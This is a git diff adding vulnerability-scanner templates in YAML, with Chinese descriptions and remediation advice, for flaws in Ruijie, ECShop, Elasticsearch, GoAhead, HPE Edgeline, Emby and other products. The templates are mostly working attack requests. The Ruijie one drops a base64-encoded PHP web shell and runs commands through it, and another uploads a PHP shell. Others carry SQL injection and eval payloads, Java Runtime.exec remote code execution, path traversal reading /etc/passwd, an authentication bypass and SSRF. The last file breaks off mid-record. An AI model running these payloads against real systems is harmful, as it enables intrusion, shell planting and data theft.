Gateway/ruijie-networks-rce.yaml @@ -0,0 +1,40 @@ +id: ruijie-networks-rce +info: + name: Ruijie Networks-EWEB Network Management System RCE + author: + - l0ne1y + tags: + - ruijie + - rce + - network + description: "锐捷 EG易网关guestIsUp.php远程命令执行漏洞 \n锐捷网络是一家拥有包括交换机、路由器、软件、安全防火墙、无线产品、存储等全系列的网络设备产品线及解决方案的专业化网络厂商。\n\n锐捷网络股份有限公司NBR路由器EWEB网管系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限。" + reference: + - /~https://github.com/yumusb/eggatewaygetshell_py/blob/main/eg.py + - https://www.ruijienetworks.com + severity: critical + remediation: |- + 官方修复方案: + 1.厂商已发布了漏洞修复程序,请及时关注更新: + https://www.ruijie.com.cn/ +requests: +- matchers: + - type: regex + part: body + regex: + - 'root:.*:0:0:' + - 'nobody:x:0:0:' + - type: status + status: + - 200 + matchers-condition: and + raw: + - | + POST /guest_auth/guestIsUp.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded;charset=UTF-8 + + ip=127.0.0.1|echo "PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K"|base64 -d > poc.php&mac=00-00 + - | + GET /guest_auth/poc.php?cmd=cat%20/etc/passwd HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded;charset=UTF-8 diff --git a/config/51pwn/yaml/Eaton Intelligent Power Manager/CVE-2018-12031.yaml b/config/51pwn/yaml/Eaton Intelligent Power Manager/CVE-2018-12031.yaml new file mode 100755 index 000000000..00b037ae9 --- /dev/null +++ b/config/51pwn/yaml/Eaton Intelligent Power Manager/CVE-2018-12031.yaml @@ -0,0 +1,32 @@ +id: CVE-2018-12031 +info: + name: Eaton Intelligent Power Manager 1.6 - Directory Traversal + author: + - l0ne1y + description: | + Eaton Intelligent Power Manager文件包含漏洞 + Eaton Intelligent Power Manager是美国Eaton公司的一款用于监控和管理屋里或虚拟环境电源的工具。 + + Eaton Intelligent Power Manager 1.6版本中存在安全漏洞。攻击者可借助'firmware'参数利用该漏洞包含文件。 + severity: critical + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁 + http://www.eaton.com/ + + 临时修复方案:
1、PHP 中使用 open_basedir 配置限制访问在指定的区域,路径长短截断
2、过滤.(点)/(反斜杠)\\(反斜杠),编码绕过
3、禁止服务器远程文件包含
4、对于限制了包含文件后缀的情况,PHP版本小于5.3,php.ini magic_quotes_gpc = off,对可控参数未使用addslashes函数,满足这三个条件就可以使用%00截断。
5、问号、井号、空格绕过(远程) +requests: +- matchers: + - type: regex + condition: or + part: body + regex: + - 'root:.*:0:0:' + - \[(font|extension|file)s\] + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd' + - '{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini' + method: GET diff --git a/config/51pwn/yaml/Ecshop/Ecshop-CollectionList-SQLi.yaml b/config/51pwn/yaml/Ecshop/Ecshop-CollectionList-SQLi.yaml new file mode 100755 index 000000000..c7f16e339 --- /dev/null +++ b/config/51pwn/yaml/Ecshop/Ecshop-CollectionList-SQLi.yaml @@ -0,0 +1,35 @@ +id: Ecshop-CollectionList-SQLi +info: + name: ECShop 4.x collection_list SQL injection + author: + - l0ne1y + description: |- + ECShop 4.x collection_list SQL 注入 + ECShop是一款专业的电商商城系统。 + + ECShop 4.x版存在SQL注入漏洞。攻击者可通过/user.php?act=collection_list参数利用该漏洞进行SQL注入攻击。 + severity: high + remediation: |- + 官方修复建议: + 厂商尚未提供漏洞修复方案,请关注厂商主页更新: + https://www.ecshop.com/ + + 临时修复方案:
1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。
2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。
3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 +requests: +- matchers: + - type: word + part: body + words: + - '{{randstr}}' + - type: word + part: body + negative: true + words: + - updatexml + matchers-condition: and + path: + - '{{BaseURL}}/user.php?act=collection_list' + method: GET + headers: + X-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953apay_log|s:55:"1' and updatexml(1,insert({{randstr}},1,1,0x7e),1) + and '";|45ea207d7a2b68c49582d2d22adf953a diff --git a/config/51pwn/yaml/Ecshop/Ecshop-Rce.yaml b/config/51pwn/yaml/Ecshop/Ecshop-Rce.yaml new file mode 100755 index 000000000..5dd95cdcf --- /dev/null +++ b/config/51pwn/yaml/Ecshop/Ecshop-Rce.yaml @@ -0,0 +1,43 @@ +id: Ecshop-Rce +info: + name: ECShop 2.x/3.x SQL注入/任意代码执行漏洞 + author: + - l0ne1y + description: |- + ECShop 2.x/3.x SQL注入/任意代码执行漏洞 + ecshop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。 + + ecshop存在SQL注入漏洞,攻击者可利用该漏洞获取网站服务器管理员权限。 + severity: high + remediation: |- + 官方修复建议: + 厂商尚未提供漏洞修复方案,请关注厂商主页更新: + https://www.ecshop.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 +requests: +- matchers: + - type: word + part: body + words: + - '{{randstr}}' + - type: word + part: body + negative: true + words: + - pp123=printf + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/user.php' + method: POST + body: action=login&pp123=printf("{{randstr}}"); + headers: + Content-Type: application/x-www-form-urlencoded + Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- + -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca diff --git a/config/51pwn/yaml/Ecshop/ecshop-sqli.yaml b/config/51pwn/yaml/Ecshop/ecshop-sqli.yaml new file mode 100755 index 000000000..d8a9edd89 --- /dev/null +++ b/config/51pwn/yaml/Ecshop/ecshop-sqli.yaml @@ -0,0 +1,47 @@ +id: ecshop-sqli +info: + name: ECShop 2.x/3.x SQL Injection + author: + - l0ne1y + description: |- + ECShop 2.x/3.x SQL注入漏洞 + ecshop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。 + + ecshop存在SQL注入漏洞,攻击者可利用该漏洞获取网站服务器管理员权限。 + severity: high + remediation: |- + 官方修复建议: + 厂商尚未提供漏洞修复方案,请关注厂商主页更新: + https://www.ecshop.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 +requests: +- matchers: + - type: word + condition: and + words: + - 'XPATH syntax error:' + - '[error] =>' + - '[0] => Array' + - MySQL server error report:Array + - type: word + condition: and + words: + - PHP Extension + - PHP Version + matchers-condition: or + raw: + - | + GET /user.php?act=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;} + - | + GET /user.php?act=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca + stop-at-first-match: true diff --git a/config/51pwn/yaml/Edgeline Infrastructure Management/CVE-2021-29203.yaml b/config/51pwn/yaml/Edgeline Infrastructure Management/CVE-2021-29203.yaml new file mode 100755 index 000000000..e05f306ba --- /dev/null +++ b/config/51pwn/yaml/Edgeline Infrastructure Management/CVE-2021-29203.yaml @@ -0,0 +1,50 @@ +id: CVE-2021-29203 +info: + name: HPE Edgeline Infrastructure Manager <1.22 - Authentication Bypass + author: + - l0ne1y + description: |- + HPE Edgeline Infrastructure Management 认证绕过漏洞 + HPE Edgeline Infrastructure Management是美国惠普(HPE)公司的一个用于数据中心环境用于管理Edge设备的软件。 + + Edgeline Infrastructure Manager 认证绕过漏洞,该漏洞源于没有充分的授权检查。以下产品及版本受到影响:Edgeline Infrastructure Manager: 1.21 。 + severity: critical + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=hpesbgn04124en_us + + 临时修复方案: + 1、前后端同时对用户输入信息进行校验,双重验证机制。 + 2、调用功能前验证用户是否有权限调用相关功能。 +requests: +- matchers: + - type: status + status: + - 201 + - type: word + condition: and + part: header + words: + - X-Auth-Token + - PasswordReset + - Location + - type: word + part: body + words: + - Base.1.0.Created + matchers-condition: and + raw: + - | + PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/json + + {"Password":"{{randstr}}"} + - | + POST /redfish/v1/SessionService/Sessions/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"UserName":"Administrator","Password":"{{randstr}}"} diff --git a/config/51pwn/yaml/Elastic EpiServer Find/CVE-2020-24550.yaml b/config/51pwn/yaml/Elastic EpiServer Find/CVE-2020-24550.yaml new file mode 100755 index 000000000..ed60dbd84 --- /dev/null +++ b/config/51pwn/yaml/Elastic EpiServer Find/CVE-2020-24550.yaml @@ -0,0 +1,33 @@ +id: CVE-2020-24550 +info: + name: EpiServer <13.2.7 - Open Redirect + author: + - l0ne1y + description: |- + Elastic EpiServer Find URL重定向漏洞 + Elastic EpiServer Find是一个开源的应用程序。一个搜索引擎,使开发人员能够在网站,Intranet以及几乎任何类型的具有文本内容的系统上构建出色的搜索体验。 + + EpiServer Find before 13.2.7 存在安全漏洞,攻击者可利用该漏洞通过精心制作的URL中的t重定向参数将用户重定向到不受信任的网站。 + severity: medium + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://nuget.episerver.com/package/?id=EPiServer.Find&v=13.2.7 + + 临时修复方案: + 1、代码固定跳转地址,不让用户控制变量。 + 2、跳转目标地址采用白名单映射机制、只对合法的 URL 做跳转。 + 3、合理充分的校验校验跳转的目标地址,非己方地址时告知用户跳转风险。 +requests: +- matchers: + - type: word + part: header + words: + - 'Location: https://bing.com' + - type: status + status: + - 301 + matchers-condition: and + path: + - '{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://bing.com' + method: GET diff --git a/config/51pwn/yaml/ElasticSearch/CVE-2014-3120.yaml b/config/51pwn/yaml/ElasticSearch/CVE-2014-3120.yaml new file mode 100755 index 000000000..4b93b0d46 --- /dev/null +++ b/config/51pwn/yaml/ElasticSearch/CVE-2014-3120.yaml @@ -0,0 +1,56 @@ +id: CVE-2014-3120 +info: + name: ElasticSearch v1.1.1/1.2 RCE + author: + - l0ne1y + description: |- + Elasticsearch 远程代码执行漏洞 + ElasticSearch是一个基于Lucene构建的开源,分布式,RESTful搜索引擎。 + + Elasticsearch用的脚本引擎是MVEL,该引擎的默认配置打开了动态脚本功能,导致攻击者可以利用工具执行任意代码。 + severity: high + remediation: |- + 官方修复建议: + 官方会在1.2版本默认关闭动态脚本,请登录官网及时下载更新: + /~https://github.com/elasticsearch/elasticsearch/issues/5853 + + 临时修复建议: + 1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。
2、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的 +requests: +- matchers: + - type: word + part: header + words: + - application/json + - type: word + part: body + words: + - '{{randstr}}' + - type: status + status: + - 200 + matchers-condition: and + raw: + - | + POST /_search?pretty HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Accept-Language: en + Content-Type: application/x-www-form-urlencoded + + { + "size": 1, + "query": { + "filtered": { + "query": { + "match_all": { + } + } + } + }, + "script_fields": { + "command": { + "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"echo {{randstr}}\").getInputStream()).useDelimiter(\"\\\\A\").next();" + } + } + } diff --git a/config/51pwn/yaml/ElasticSearch/CVE-2015-1427.yaml b/config/51pwn/yaml/ElasticSearch/CVE-2015-1427.yaml new file mode 100755 index 000000000..74806ac34 --- /dev/null +++ b/config/51pwn/yaml/ElasticSearch/CVE-2015-1427.yaml @@ -0,0 +1,49 @@ +id: CVE-2015-1427 +info: + name: ElasticSearch - Remote Code Execution + author: + - l0ne1y + description: |- + Elasticsearch Groovy Scripting Engine Sandbox 安全绕过漏洞 + ElasticSearch是一个基于Lucene构建的开源,分布式,RESTful搜索引擎。 + Elasticsearch Groovy脚本引擎沙盒存在安全绕过漏洞,攻击者可利用此漏洞绕过某些安全限制执行未授权操作。 + severity: critical + remediation: |- + 官方修复建议: + 建议升级该组件至最新版本。 + /~https://github.com/elasticsearch + + 临时修复建议: + 临时修复方案:
1、前后端同时对用户输入信息进行校验,双重验证机制。
2、调用功能前验证用户是否有权限调用相关功能。 +requests: +- matchers: + - type: word + part: header + words: + - application/json + - type: word + part: body + words: + - '{{randstr}}' + - type: status + status: + - 200 + matchers-condition: and + raw: + - | + POST /website/blog/ HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Accept-Language: en + Content-Type: application/x-www-form-urlencoded + + { + "name": "test" + } + - | + POST /_search HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + + {"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo {{randstr}}\").getText()"}}} diff --git a/config/51pwn/yaml/ElasticSearch/CVE-2015-3337.yaml b/config/51pwn/yaml/ElasticSearch/CVE-2015-3337.yaml new file mode 100755 index 000000000..d1bbdf3b3 --- /dev/null +++ b/config/51pwn/yaml/ElasticSearch/CVE-2015-3337.yaml @@ -0,0 +1,31 @@ +id: CVE-2015-3337 +info: + name: Elasticsearch Head plugin LFI + author: + - l0ne1y + description: |- + ElasticSearch site 插件 目录遍历与文件读取漏洞 + lasticsearch是荷兰Elasticsearch公司的一套基于Lucene构建的开源分布式RESTful搜索引擎,它主要用于云计算中,并支持通过HTTP使用JSON进行数据索引。 + + Elasticsearch 1.5.2之前版本和1.4.5版本存在安全漏洞。由于程序读取文件前未能正确验证输入。当程序启用‘site plugin’插件时,攻击者可通过目录遍历序列利用该漏洞泄露任意本地文件的内容。 + severity: medium + remediation: |- + 官方修复方案: + 用户可参考如下供应商提供的安全公告获得补丁信息: + https://www.elastic.co/blog/elasticsearch-1-5-2-and-1-4-5-released + + 临时修复方案: + 系统开发阶段的防御,在系统开发阶段应充分考虑系统的安全性,对目录遍历漏洞来说,需对用户提交的内容进行严格的过滤,这里主要指过滤目录跳转符,字符截断符,dir命令等。 +requests: +- matchers: + - type: regex + part: body + regex: + - 'root:.*:0:0:' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd' + method: GET diff --git a/config/51pwn/yaml/ElasticSearch/CVE-2015-5531.yaml b/config/51pwn/yaml/ElasticSearch/CVE-2015-5531.yaml new file mode 100755 index 000000000..085a79b8a --- /dev/null +++ b/config/51pwn/yaml/ElasticSearch/CVE-2015-5531.yaml @@ -0,0 +1,54 @@ +id: CVE-2015-5531 +info: + name: ElasticSearch directory traversal vulnerability (CVE-2015-5531) + author: + - l0ne1y + description: |- + Elasticsearch <1.6.1 目录遍历与文件读取漏洞 + Elasticsearch是荷兰Elasticsearch公司的一套基于Lucene构建的开源分布式RESTful搜索引擎,它主要用于云计算中,并支持通过HTTP使用JSON进行数据索引。 + + Elasticsearch 1.0.0版本至1.6.0版本中存在目录遍历漏洞,该漏洞源于程序未能充分过滤用户提交的输入。远程攻击者可借助目录遍历字符‘..’利用该漏洞访问包含敏感信息的任意文件。 + severity: medium + remediation: | + 官方修复方案: + 目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接: + https://discuss.elastic.co/t/elasticsearch-directory-traversal-vulnerability-cve-2015-5531/25737 + + 临时修复方案:
1、过滤\".\",使用户在url中不能回溯上级目录。
2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - ElasticsearchParseException + - Failed to derive xcontent from + - 114, 111, 111, 116, 58 + - type: status + status: + - 400 + matchers-condition: and + raw: + - | + PUT /_snapshot/test HTTP/1.1 + Host: {{Hostname}} + + { + "type": "fs", + "settings": { + "location": "/usr/share/elasticsearch/repo/test" + } + } + - | + PUT /_snapshot/test2 HTTP/1.1 + Host: {{Hostname}} + + { + "type": "fs", + "settings": { + "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata" + } + } + - | + GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 + Host: {{Hostname}} diff --git a/config/51pwn/yaml/ElasticSearch/CVE-2021-22145.yaml b/config/51pwn/yaml/ElasticSearch/CVE-2021-22145.yaml new file mode 100755 index 000000000..7efbec97c --- /dev/null +++ b/config/51pwn/yaml/ElasticSearch/CVE-2021-22145.yaml @@ -0,0 +1,40 @@ +id: CVE-2021-22145 +info: + name: ElasticSearch 7.13.3 - Memory disclosure + author: + - l0ne1y + description: |- + Elasticsearch 敏感信息泄漏漏洞 + Elasticsearch 是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎,基于RESTful web接口。 + Elasticsearch 存在敏感信息泄漏漏洞,攻击者可构造恶意请求触发相关内存泄漏,从而获取相关敏感信息。 + + 影响版本: + 7.10.0 <= Elasticsearch <= 7.13.3 + severity: high + remediation: |- + 官方修复方案: + 升级到官方最新版本: + https://www.elastic.co/cn/ + + 临时修复方案: + 去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - root_cause + - truncated + - reason + - type: status + status: + - 400 + matchers-condition: and + path: + - '{{BaseURL}}/_bulk' + method: POST + body: | + @ + headers: + Content-Type: application/json diff --git a/config/51pwn/yaml/ElasticSearch/elasticsearch.yaml b/config/51pwn/yaml/ElasticSearch/elasticsearch.yaml new file mode 100755 index 000000000..dfdf7afaa --- /dev/null +++ b/config/51pwn/yaml/ElasticSearch/elasticsearch.yaml @@ -0,0 +1,40 @@ +id: elasticsearch +info: + name: ElasticSearch Information Disclosure + author: + - l0ne1y + description: | + Elasticsearch 敏感信息泄漏漏洞 + Elasticsearch 是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎,基于RESTful web接口。 + Elasticsearch 存在敏感信息泄漏漏洞,攻击者可利用此漏洞从而获取相关敏感信息。 + severity: low + remediation: |- + 官方修复方案: + 升级到官方最新版本: + https://www.elastic.co/cn/ + + 临时修复方案: + 去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 +requests: +- matchers: + - type: word + condition: or + words: + - '"took":' + - '"number" :' + - type: status + status: + - 200 + extractors: + - type: regex + regex: + - '"number"\s:\s"([0-9.]+)"' + group: 1 + part: body + matchers-condition: and + path: + - '{{BaseURL}}/?pretty' + - '{{BaseURL}}/_cat/indices?v' + - '{{BaseURL}}/_all/_search' + method: GET + stop-at-first-match: true diff --git a/config/51pwn/yaml/Embedthis GoAhead/CVE-2017-17562.yaml b/config/51pwn/yaml/Embedthis GoAhead/CVE-2017-17562.yaml new file mode 100755 index 000000000..0d8e3fc67 --- /dev/null +++ b/config/51pwn/yaml/Embedthis GoAhead/CVE-2017-17562.yaml @@ -0,0 +1,97 @@ +id: CVE-2017-17562 +info: + name: Embedthis GoAhead RCE + author: + - l0ne1y + description: "Embedthis GoAhead 安全漏洞 \n Embedthis GoAhead是美国Embedthis软件公司的一款嵌入式Web服务器。\n\nEmbedthis + GoAhead 3.6.5之前的版本中存在安全漏洞。远程攻击者可利用该漏洞执行代码。 " + severity: high + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁。 + /~https://github.com/embedthis/goahead/commit/6f786c123196eb622625a920d54048629a7caa74 + + 临时修复方案:
1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。
2、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + condition: and + words: + - environment variable + - display library search paths + matchers-condition: and + raw: + - | + GET /cgi-bin/{{endpoint}}?LD_DEBUG=help HTTP/1.1 + Host: {{Hostname}} + Accept: */* + payloads: + endpoint: + - admin + - apply + - non-CA-rev + - cgitest + - checkCookie + - check_user + - chn/liveView + - cht/liveView + - cnswebserver + - config + - configure/set_link_neg + - configure/swports_adjust + - eng/liveView + - firmware + - getCheckCode + - get_status + - getmac + - getparam + - guest/Login + - home + - htmlmgr + - index + - index/login + - jscript + - kvm + - liveView + - login + - login.asp + - login/login + - login/login-page + - login_mgr + - luci + - main + - main-cgi + - manage/login + - menu + - mlogin + - netbinary + - nobody/Captcha + - nobody/VerifyCode + - normal_userLogin + - otgw + - page + - rulectl + - service + - set_new_config + - sl_webviewer + - ssi + - status + - sysconf + - systemutil + - t/out + - top + - unauth + - upload + - variable + - wanstatu + - webcm + - webmain + - webproc + - webscr + - webviewLogin + - webviewLogin_m64 + - webviewer + - welcome + stop-at-first-match: true diff --git a/config/51pwn/yaml/Emby Server/CVE-2020-26948.yaml b/config/51pwn/yaml/Emby Server/CVE-2020-26948.yaml new file mode 100755 index 000000000..1394d294d --- /dev/null +++ b/config/51pwn/yaml/Emby Server/CVE-2020-26948.yaml @@ -0,0 +1,39 @@ +id: CVE-2020-26948 +info: + name: Emby Server Server-Side Request Forgery + author: + - l0ne1y + description: |- + Emby Server 服务器端请求伪造漏洞 + Emby Server是个人开发者的一款功能强大的媒体服务器。该产品主要可用于视频音频和照片等多媒体整合编辑。 + + Emby Server 4.5.0之前版本存在代码问题漏洞,该漏洞源于网络系统或产品的代码开发过程中存在设计或实现不当的问题。该漏洞允许攻击者通过Items / RemoteSearch / Image ImageURL参数使用SSRF。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + /~https://github.com/MediaBrowser/Emby + + 临时修复方案: + 1、过滤内网服务器对公网服务器请求的响应。如果Web应用是获取某一类型的文件,在把返回结果展示给用户之前应先验证返回的信息是否符合文件类型标准,比如返回信息应为图片,如果返回信息是HTML,则停止将返回信息返回客户端。 + 2、统一错误提示信息,避免用户可以根据错误信息来判断远端服务器的端口状态。 + 3、在内网服务器的防火墙上限制公网服务器的请求端口为HTTP等协议常用端口,如:80、443、8080、8090。 + 4、若公网服务器的内网IP与内网无业务通信,建议将公网服务器对应的内网IP列入黑名单,避免应用被用来获取内网数据。 + 5、内网服务器禁用不必要的协议,仅允许HTTP和HTTPS请求,防止类似于file:///、gopher://、ftp:// 等协议引起的安全问题。 +requests: +- matchers: + - type: status + status: + - 500 + - type: word + part: body + words: + - Name or service not known + - type: word + part: header + words: + - text/plain + matchers-condition: and + path: + - '{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net' + method: GET diff --git a/config/51pwn/yaml/Employee Records System/CVE-2019-20183.yaml b/config/51pwn/yaml/Employee Records System/CVE-2019-20183.yaml new file mode 100755 index 000000000..1dec4a765 --- /dev/null +++ b/config/51pwn/yaml/Employee Records System/CVE-2019-20183.yaml @@ -0,0 +1,62 @@ +id: CVE-2019-20183 +info: + name: Simple Employee Records System 1.0 arbitrary file upload + author: + - l0ne1y + description: |- + Employee Records System 文件上传漏洞 + Employee Records System是一个小型企业员工记录保存系统。 + + Employee Records System 1.0版本中的uploadimage.php文件存在安全漏洞,该漏洞源于程序仅在客户端验证了文件扩展。攻击者可利用该漏洞上传并执行任意的PHP代码。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.sourcecodester.com/php/11393/employee-records-system.html + + 临时修复方案: + 1、服务器端将文件上传目录直接设置为不可执行。 + 2、文件类型检查:建议使用白名单方式(比黑名单更可靠),并结合MIME Type、后缀检查等方式(文件类型做白名单限制)。此外对于图片的处理可以使用压缩函数或resize函数,处理图片的同时破坏其包含的HTML代码。 + 3、使用随机数改写文件名和文件路径,使得用户不能轻易访问自己上传的文件。 + 4、单独设置文件服务器的域名。 + 5、验证文件内容,使用正则匹配恶意代码(过滤恶意代码各种绕过方式,如大小写、BASE64编码)限制上传。 + 6、修复服务器可能存在的解析漏洞。 + 7、严格限制可以修改服务器配置的文件上传如:.htaccess。 + 8、隐藏上传文件路径。 + 9、及时修复Web上传代码。 + 10、不能有本地文件包含漏洞。 + 11、注意0x00截断攻击(PHP更新到最新版本)。 +requests: +- matchers: + - type: regex + condition: and + part: body + regex: + - 'root:.*:0:0:' + extractors: + - name: endpoint + type: regex + regex: + - (?:[a-zA-Z0-9+\/])*_poc.php + part: body + internal: true + raw: + - | + POST /dashboard/uploadID.php HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/javascript, */*; q=0.01 + X-Requested-With: XMLHttpRequest + Content-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337 + + -----------------------------5825462663702204104870787337 + Content-Disposition: form-data; name="employee_ID"; filename="poc.php" + Content-Type: image/png + + + -----------------------------5825462663702204104870787337-- + - | + GET /uploads/employees_ids/{{endpoint}}?cmd=cat%20/etc/passwd HTTP/1.1 + Host: {{Hostname}} diff --git a/config/51pwn/yaml/Endress+Hauser WirelessHART Fieldgate SWG70/CVE-2018-16059.yaml b/config/51pwn/yaml/Endress+Hauser WirelessHART Fieldgate SWG70/CVE-2018-16059.yaml new file mode 100755 index 000000000..d533f2796 --- /dev/null +++ b/config/51pwn/yaml/Endress+Hauser WirelessHART Fieldgate SWG70/CVE-2018-16059.yaml @@ -0,0 +1,47 @@ +id: CVE-2018-16059 +info: + name: WirelessHART Fieldgate SWG70 3.0 - Directory Traversal + author: + - daffainfo + tags: + - cve + - cve2018 + - iot + - lfi + description: |- + Endress+Hauser WirelessHART Fieldgate SWG70 路径遍历漏洞 + Endress+Hauser WirelessHART Fieldgate SWG70是一款以太网网关设备。 + + Endress+Hauser WirelessHART Fieldgate SWG70 3.x版本中的fcgi-bin/wgsetcgi界面的‘filename’参数存在目录遍历漏洞。攻击者可利用该漏洞查看系统上的任意文件。 + reference: + - https://nvd.nist.gov/vuln/detail/cve-2018-16059 + - https://www.exploit-db.com/exploits/45342 + - https://www.exploit-db.com/exploits/45342/ + - https://ics-cert.us-cert.gov/advisories/icsa-19-073-03 + severity: medium + classification: + cve-id: + - cve-2018-16059 + cwe-id: + - cwe-22 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + remediation: 